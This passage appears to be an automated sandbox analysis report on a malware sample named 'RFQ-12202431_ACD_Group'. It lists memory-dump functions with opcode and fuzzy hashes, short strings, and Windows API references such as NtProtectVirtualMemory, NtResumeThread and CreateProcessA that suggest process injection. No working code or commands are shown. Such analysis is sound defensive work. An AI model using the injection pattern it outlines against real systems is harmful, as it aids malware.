Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: 041fc58794562e1f427ac274563bab2d3c06f7dae50acdb29fe1deacfd2e80a5
Instruction ID: 05a362a8c57326dbd44125bf94bd33e1e2ebfd66ed6d29420041ebb81de19a0c
Opcode Fuzzy Hash: 041fc58794562e1f427ac274563bab2d3c06f7dae50acdb29fe1deacfd2e80a5
Instruction Fuzzy Hash: 51812874D052698FEB54DF69CC40BD9BBB6BF8A300F0482EAD449A7254DB306E85CF91

Function 068F0007 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

Te^q, xrefs: 068F03F8

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3c0da93f1c017491d9168517b10326eabe74ceac1d787a5e9fa8889bed26550f
Instruction ID: 75784b8c30417509de5bde717f5a415f870faa0ae35c4add1e299a29dbf3b175
Opcode Fuzzy Hash: 3c0da93f1c017491d9168517b10326eabe74ceac1d787a5e9fa8889bed26550f
Instruction Fuzzy Hash: 76322570A05218CFDBA4CF68C854B9DBBB2FB8A304F1081AAD649EB356DB745D85CF41

Function 068F0040 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

Te^q, xrefs: 068F03F8

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 7d753edb7b80680dab5bee75faeb9e0a9984774005b0ec2841246356266fb507
Instruction ID: 587c0aca9cb731954f160cbb717bb6cd366138582b15c6260283156e4747790b
Opcode Fuzzy Hash: 7d753edb7b80680dab5bee75faeb9e0a9984774005b0ec2841246356266fb507
Instruction Fuzzy Hash: 75222270A04218CFEBA4DF69C854BADB7F6BB8A304F1080A9DA49E7356DB745D81CF40

Function 06B03890 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06B03921

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 63ae54e8c893606208fe2e985389298b411c8d09818f89204a4ca03b7a27b521
Instruction ID: 4be1aaba6bca0762ff4486c9ff21335a566395dd55274b482e63b26925a9fb1e
Opcode Fuzzy Hash: 63ae54e8c893606208fe2e985389298b411c8d09818f89204a4ca03b7a27b521
Instruction Fuzzy Hash: A5210FB1D003499FDB10DFAAD984AEEFFF5BB88310F20842AE459A3250C7759955CFA4

Function 06B03898 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06B03921

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9e8f763ff65f842ac6e6e55712e3edd3c381dcec8be067ed62db334c05c762c9
Instruction ID: bfee360c430efc3b1b5d1f147c41bc24eb1604a8afb3faf5bbdc357ab4af8c62
Opcode Fuzzy Hash: 9e8f763ff65f842ac6e6e55712e3edd3c381dcec8be067ed62db334c05c762c9
Instruction Fuzzy Hash: BC2100B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE459A7250C775A940CBA4

Function 06B06AFB Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06B06B6E

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b23dd11e267206716051fd51631fd446966025858b4fd857aceff23f82e1fa1a
Instruction ID: e8e21d6b29f1a0fbf4acd13ffdc0a610a9b5981887d134ca737e47c9ab2dcd12
Opcode Fuzzy Hash: b23dd11e267206716051fd51631fd446966025858b4fd857aceff23f82e1fa1a
Instruction Fuzzy Hash: 231103B1D002498EDB10DFAAC885BEEFFF4AF88324F20842AD459A7250C7749945CFA4

Function 06B06B00 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06B06B6E

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4ffc6cc62384ad87766bc566d6d2b32d723df6874edd8a8e1a467ead389643f8
Instruction ID: 47f67faad3e8b1709c49c4fd09dba7527f05a42f95ee79d518012876b1acf9b1
Opcode Fuzzy Hash: 4ffc6cc62384ad87766bc566d6d2b32d723df6874edd8a8e1a467ead389643f8
Instruction Fuzzy Hash: DB11E4B1D002498FDB10DFAAC485B9EFBF4EF88324F10842AD459A7250DB75A945CFA5

Function 06A59F28 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06A5A27D

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 77d16f62326ecf826dab2f3ccf2f4a752b1d60bdfc162363c316f494b730dea2
Instruction ID: dd1934f5f4345cb9659db090ee9f842278282a89ebec535296b44e96d7d408f0
Opcode Fuzzy Hash: 77d16f62326ecf826dab2f3ccf2f4a752b1d60bdfc162363c316f494b730dea2
Instruction Fuzzy Hash: 4BC14B74E04218CFEB90EFA5C444BADBBB2FB4A304F1181A9DA49AB355CB745D85CF41

Function 06D2EEC8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Deq, xrefs: 06D2EFCD

Memory Dump Source

Source File: 00000000.00000002.1795589611.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: bf757dc287abd030f39cc2dfa1adbcdc10c6cdf03f834a75f107e90a46ee507d
Instruction ID: 1ef00e593cf32052bb2fe4438ecf4ada1ad400c432627231b78c3c100703f5b0
Opcode Fuzzy Hash: bf757dc287abd030f39cc2dfa1adbcdc10c6cdf03f834a75f107e90a46ee507d
Instruction Fuzzy Hash: 78D1D174E00219CFDB54DFA9D984B9DBBB2BF89304F1084A9D409AB365DB31AD81CF51

Function 06907350 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Te^q, xrefs: 069074FE

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: cced7d8b0b10436180c1787a594cba489170d5cf5cfb9e5549977443db461689
Instruction ID: 89dd6c7b3111de7363d10b5bb04648f81b299c57d74dcd364806bcca41504c71
Opcode Fuzzy Hash: cced7d8b0b10436180c1787a594cba489170d5cf5cfb9e5549977443db461689
Instruction Fuzzy Hash: 5DB1F2B4E05208CFEB94CFA9D584B9DBBF6BB49314F2094A9D409EB691DB306D85CF40

Function 06907340 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

Te^q, xrefs: 069074FE

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 695f8797afec78589a891b99d4c5711a18356f78fac845b61dc4a43d83d40778
Instruction ID: 3a8fb9281de4da6cf4f5860fef8a0ce3136b64a55f2eb9c5f5a89ef04cefbea8
Opcode Fuzzy Hash: 695f8797afec78589a891b99d4c5711a18356f78fac845b61dc4a43d83d40778
Instruction Fuzzy Hash: 2DB1E2B4E05208CFEB94CFA9D584B9DBBF2BB49314F2084A9D409EB691DB316985CF40

Function 06818DDB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c325c0bbd94a0f8d15790cc749badaafd2ca75409c0e0ecdf7546c58753150
Instruction ID: b51e2cba8b89b828d5e43476b3b3a7a897ae6a1e89ac35803fa7bb3f03bdb91b
Opcode Fuzzy Hash: 17c325c0bbd94a0f8d15790cc749badaafd2ca75409c0e0ecdf7546c58753150
Instruction Fuzzy Hash: F652B274A002288FCB64DF28C994B9EB7B6FB89301F1085D9D94DAB355DB30AE85CF51

Function 06A5EED1 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaada2d7cd8be1f4a08a2cf872299a642d4715abef0f32ba24ba1fbc15b8832f
Instruction ID: 62f1c8e4b99f4e02ff3ba015ba35643ad1a528085fad9d4ae234000e720a9ee0
Opcode Fuzzy Hash: eaada2d7cd8be1f4a08a2cf872299a642d4715abef0f32ba24ba1fbc15b8832f
Instruction Fuzzy Hash: 36810A74E14218CFDB94EF68D4887ADB7F6BB8A300F119069D819E7255DB34AE85CF40

Function 06A5EBEB Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62db6a3c6a174aa7eb1a6473e6a243ccee8968aae8787455ea498f84c863fa2
Instruction ID: 823f2ce7ee9db92aeacc9d6dd2606d6fc023f2d400839b47a48b77d61a154acf
Opcode Fuzzy Hash: e62db6a3c6a174aa7eb1a6473e6a243ccee8968aae8787455ea498f84c863fa2
Instruction Fuzzy Hash: FB711B74E04218CFDB94EF68D4847ADB7F6BB8A300F119069D819E725ADB346E45CF40

Function 06817479 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54829be720164b7d29ec08f02e11e0811c8663c6f8ac36a8e8c578c951d8546
Instruction ID: 40b07903c13645a03cf4702821c468a6ec52222c0738ac58421f0f21467fe0f7
Opcode Fuzzy Hash: f54829be720164b7d29ec08f02e11e0811c8663c6f8ac36a8e8c578c951d8546
Instruction Fuzzy Hash: A6519971E00A188BDB18CF6BDC4479EBAF7BFC9305F14C1A9D449AA258DB745A81CF50

Function 068FA730 Relevance: 4.2, Strings: 3, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 068FAC05
Hbq, xrefs: 068FAC84
Hbq, xrefs: 068FAC34

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: 88a77790407df99831c84df001c30c1795cd83ec411b7e4bfe25b026ea5ad677
Instruction ID: f1a9ab455e3305a12513c9e11379aad959ad8f32b0487ddfbd5cdaf8c8e23934
Opcode Fuzzy Hash: 88a77790407df99831c84df001c30c1795cd83ec411b7e4bfe25b026ea5ad677
Instruction Fuzzy Hash: 24124E31A10205CFDB68DFA9C894A6EB7F2FF88310B148929D64ADB354DB35EC45CB91

Function 06841390 Relevance: 4.2, Strings: 2, Instructions: 1686COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06842669
4'^q, xrefs: 06842659

Memory Dump Source

Source File: 00000000.00000002.1794068217.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6840000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 277b7f30eb7190401423968d685ed2b62c4141689090ecca7888562c2b1e43c8
Instruction ID: eeca7a79c13f79330ddb0b59ed2446f4c9671b72391106dfc7b190f483a353bc
Opcode Fuzzy Hash: 277b7f30eb7190401423968d685ed2b62c4141689090ecca7888562c2b1e43c8
Instruction Fuzzy Hash: BAE2D430D0938D9FDB56DBA4CC58BAE7FB5AF06300F154096F680EB2A2C7785985CB61

Function 068FC3E8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 068FC761
4'^q, xrefs: 068FC6E1
4'^q, xrefs: 068FC602

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 15dc60689ee2bc707c3b1a7397211298a9fcab986b8a2769f54adbdfe01655d7
Instruction ID: bf4659d483d6330948846ee3952a70adc1318b5db7df9cd7837ce868825ba950
Opcode Fuzzy Hash: 15dc60689ee2bc707c3b1a7397211298a9fcab986b8a2769f54adbdfe01655d7
Instruction Fuzzy Hash: 76F1ED34A10218CFC744DFA8D998AAEB7B2FF88300F118555EA05AB3A5DB75ED46CF41

Function 068F8811 Relevance: 3.9, Strings: 3, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 068F89F5
(bq, xrefs: 068F898B
(bq, xrefs: 068F8934

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq$(bq$W
API String ID: 0-1910679602
Opcode ID: 5a4a494d49cd58f3070aa317aefb18a939624332df5401c2e965e6ba85a3309c
Instruction ID: 9fa3aa91e20eeb0e97fd3b18a9b98741bd71ae3ade5abf14791c43bd733d53e5
Opcode Fuzzy Hash: 5a4a494d49cd58f3070aa317aefb18a939624332df5401c2e965e6ba85a3309c
Instruction Fuzzy Hash: 5351EE317002159FDB559F28D850AAE7BA2FF84340F24856AEA06CB3A1DF38DC56CB91

Function 068429D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06842E76
4'^q, xrefs: 06842E66

Memory Dump Source

Source File: 00000000.00000002.1794068217.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6840000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 5661b31233fe5a459dc32f2905cfc98fd673333435d2203ad30b59cc547060a7
Instruction ID: 94ca52151b4d884a89d7d658dc8e2d56a21e610f8b559aaf0a1bf43b2c354e6a
Opcode Fuzzy Hash: 5661b31233fe5a459dc32f2905cfc98fd673333435d2203ad30b59cc547060a7
Instruction Fuzzy Hash: 83F1F470D0521CDFCB98EFA8E5A86ACBBB2FF49315F204129E906A7350DB395985CF50

Function 068F6270 Relevance: 2.7, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 068F6405
(bq, xrefs: 068F6376

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 99939707bf2fd6866d1a37f460d92e4a644b62018706189443d6418c6d7f514a
Instruction ID: c57dc1221f85aa4b8e997fca2734859298de2b135b87a8888b39760f9f70d953
Opcode Fuzzy Hash: 99939707bf2fd6866d1a37f460d92e4a644b62018706189443d6418c6d7f514a
Instruction Fuzzy Hash: D45169307002558FC769AF38C46452EBBB2FF99240724456DEA46CB3A1DF39EC4ACB95

Function 02ACA9FD Relevance: 2.6, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xz^q, xrefs: 02ACAA59
Xz^q, xrefs: 02ACAB09

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Xz^q$Xz^q
API String ID: 0-3240313961
Opcode ID: dcb002c75fd9ba6254e0624836d67a5e2b57c7c988a2a23a8007ad005785cf9e
Instruction ID: 3d6aaadc5dc6d1c3ea925206115fd2f0fc57371406ffd2e7b310027590d763c3
Opcode Fuzzy Hash: dcb002c75fd9ba6254e0624836d67a5e2b57c7c988a2a23a8007ad005785cf9e
Instruction Fuzzy Hash: 9D51C074A40229CFCB64DF64D998AE8BBB5BF48300F1041EAE589A7365DB749EC5CF40

Function 069011C0 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

R, xrefs: 069011ED
-, xrefs: 0690291B

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: -$R
API String ID: 0-3143228895
Opcode ID: f99e14b304b10d2f2ecb60e0fd9088b59c1ade0ab0b2180190c8fe11223f9f1c
Instruction ID: e02214a5502a49818780c604aaa24e4b20a69eb5777045aedcd7c7bc65a9783a
Opcode Fuzzy Hash: f99e14b304b10d2f2ecb60e0fd9088b59c1ade0ab0b2180190c8fe11223f9f1c
Instruction Fuzzy Hash: 1A31E270941228CFEBA4EF24DC88BADB7B6BF49304F4046E9D819A7294CB355E81CF41

Function 069014A5 Relevance: 2.5, Strings: 2, Instructions: 28COMMON

Download Yara Rule

Strings

B, xrefs: 069014E5
S, xrefs: 06900DE2

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: B$S
API String ID: 0-2413125972
Opcode ID: d201109a3708ac57bc37409a511f291ebdf9a4c8f23428100a3db78f22dea076
Instruction ID: 27a1c491d0db5acdd3778c8cd60d70f9ad907ab3c45419c83af72ff14414f44f
Opcode Fuzzy Hash: d201109a3708ac57bc37409a511f291ebdf9a4c8f23428100a3db78f22dea076
Instruction Fuzzy Hash: EA01E478A152288FEBA5DF24D888799B7B9FB4A314F1051D9A549A3384CB345F80CF00

Function 0684135B Relevance: 2.4, Strings: 1, Instructions: 1187COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06842659

Memory Dump Source

Source File: 00000000.00000002.1794068217.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6840000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 045bd7741c9533eac007b6b436a06cbdba8ab9e241e7cbe3d0e4eff2d9c8af38
Instruction ID: 3a6ccb5ca24584efaae54ecd35570a46406aa827be2872829d473f6d34b8e8db
Opcode Fuzzy Hash: 045bd7741c9533eac007b6b436a06cbdba8ab9e241e7cbe3d0e4eff2d9c8af38
Instruction Fuzzy Hash: 23A25B7090A3C9AFD7279B749C59BAA7F78AF03304F1941DBE580DB1E3C6685848C762

Function 068FD2C0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 068FD63B

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: dcd4f274f877b4528017c3853cd9bc0b2b8df32f1e7b47066807392103d320a9
Instruction ID: 540da1d2d8c67113a6ad58e5a14bca7d5c8dc7509060a05736e50b4cdb45597f
Opcode Fuzzy Hash: dcd4f274f877b4528017c3853cd9bc0b2b8df32f1e7b47066807392103d320a9
Instruction Fuzzy Hash: 23520575A102288FDB64CF68C991BADBBF2BF88300F1545D9E649EB351DA349D80CF61

Function 068F7820 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_^q, xrefs: 068F7AAD

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: f795b2d05f0999f6859c3744f26f7947f8b1f57b948fc7e2916ca03ee9f48367
Instruction ID: 4cd299659acb2dd874be4312fedaab9569396f86703d31a1697decda2f485576
Opcode Fuzzy Hash: f795b2d05f0999f6859c3744f26f7947f8b1f57b948fc7e2916ca03ee9f48367
Instruction Fuzzy Hash: 0D228C35A102159FEB54DFA8D494AADB7F2FF88300F158469EA05EB3A1CB75ED40CB90

Function 06B042FF Relevance: 1.7, APIs: 1, Instructions: 206processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06B044E2

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7d66899b5a536940b29fd6429e992ce927f43a9663c9cde1522923f2bb9d6b4c
Instruction ID: 317dabbcffc4fe211894c412fcdedcad4d76fb8789b9093bcd3882ec6159cebe
Opcode Fuzzy Hash: 7d66899b5a536940b29fd6429e992ce927f43a9663c9cde1522923f2bb9d6b4c
Instruction Fuzzy Hash: AA8135B1D00249DFEB50CFA9C8817EEBFF1EF48314F148169E959A7294DB749882CB81

Function 06B04308 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06B044E2

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5a7f6a9b3c6714c06ad0b0d774df07011cc25b73a1ebb5dbf683c4f04235fabf
Instruction ID: 1b1b057138d3de12c4951e2032b7df715fb296db4fde64a108e48468488c4415
Opcode Fuzzy Hash: 5a7f6a9b3c6714c06ad0b0d774df07011cc25b73a1ebb5dbf683c4f04235fabf
Instruction Fuzzy Hash: EF8125B1D00259DFEB50CFA9C8817ADBFF1FF48314F148569E958A7294DB749882CB81

Function 05C387C5 Relevance: 1.6, APIs: 1, Instructions: 147fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05C38915

Memory Dump Source

Source File: 00000000.00000002.1792356924.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 33d6321132d40b9a498457babdc41efbe6459841665ff0b1bcfbb5f638af23f6
Instruction ID: 7f9c6c33fe7b1f901ba3c11c3c91d35539b57aad7da09a28ec868f1bdc9aaf62
Opcode Fuzzy Hash: 33d6321132d40b9a498457babdc41efbe6459841665ff0b1bcfbb5f638af23f6
Instruction Fuzzy Hash: 10515870D0175DDFDB10CFA9C9867EEBBF2BF48310F248929E859A7284D77499418B82

Function 05C387D0 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 05C38915

Memory Dump Source

Source File: 00000000.00000002.1792356924.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 53241809604d78cf64bf9bcbdbf57a2efc7cd5a69293c4d18cac5458e774574c
Instruction ID: f94e6f0e92e7a89eb5b06e616dd1163d7939adefdddfabe43da5ac848de5ddea
Opcode Fuzzy Hash: 53241809604d78cf64bf9bcbdbf57a2efc7cd5a69293c4d18cac5458e774574c
Instruction Fuzzy Hash: 3E516A70D0135DDFDB10CFA9C8467ADBBF2BF48310F248929E859A7284D7749941CB82

Function 068FE1E6 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

$^q, xrefs: 068FE28F

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 34990a15bfe2f9df44a35afef2410e924da27113ab6143f535e5871577df3457
Instruction ID: 57c296b859022bdbb74ff7da05b6d2a38293be347c39bb36902b8217f547a0c2
Opcode Fuzzy Hash: 34990a15bfe2f9df44a35afef2410e924da27113ab6143f535e5871577df3457
Instruction Fuzzy Hash: 63C1A370B102169FDB959F28C46977D7AE2FF98300F14442DE782DB3A1DA38D941CB66

Function 06A5E000 Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A5DFB4

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5464b388d0b8cb87abb1715adfa9147c0b44057f042e6e2926ca3777bdca7f75
